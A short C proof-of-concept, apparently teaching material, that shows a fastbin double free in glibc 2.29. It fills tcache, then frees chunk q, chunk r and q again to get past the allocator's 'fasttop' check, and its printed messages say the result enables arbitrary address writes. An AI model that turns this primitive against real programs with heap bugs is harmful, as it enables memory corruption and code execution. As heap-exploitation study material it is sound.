fastbin_double_free.c

#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
int main()
{
    /*this is double free related security mechanisms in glibc 2.29.
     *	if (__builtin_expect (old == p, 0))
	  malloc_printerr ("double free or corruption (fasttop)");
    * */
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    printf("fastbin_double_free can help you achieve \"arbitrary address writes\"\n");

    void *q,*r,*d;
    void *p[7];
    printf("First of all ,we need to Apply for heap blocks of the same size to consume tcache!\n");
    for(int i=0;i<7;i++)
    {
        p[i] = malloc(0x10);
        printf("p[%d]  ===>  %p\n",i,p[i]);
    }
    q = malloc(0x10);
    r = malloc(0x10);
    printf("now , we need to free 7 heap blocks to populate tcache linked list!\n");
    for(int i=0;i<7;i++)
    {
        printf("now free p[%d]  ===>  %p\n",i,p[i]);
        free(p[i]);
        p[i] = 0;
    }
    printf("now ,Our free heap blocks will be put into fastbin\n");
    printf("now free q  ===>  %p\n",q);
    free(q);
    printf("in order to achieve double free , we need to free another block to bypass check in glibc 2.29 !\n");
    printf("now free r  ===>  %p\n",r);
    free(r);
    printf("now we free q again!\n");
    printf("now free q  ===>  %p\n",q);
    free(q);
    printf("OK,we already achieve double free in glibc 2.29.!\n");
}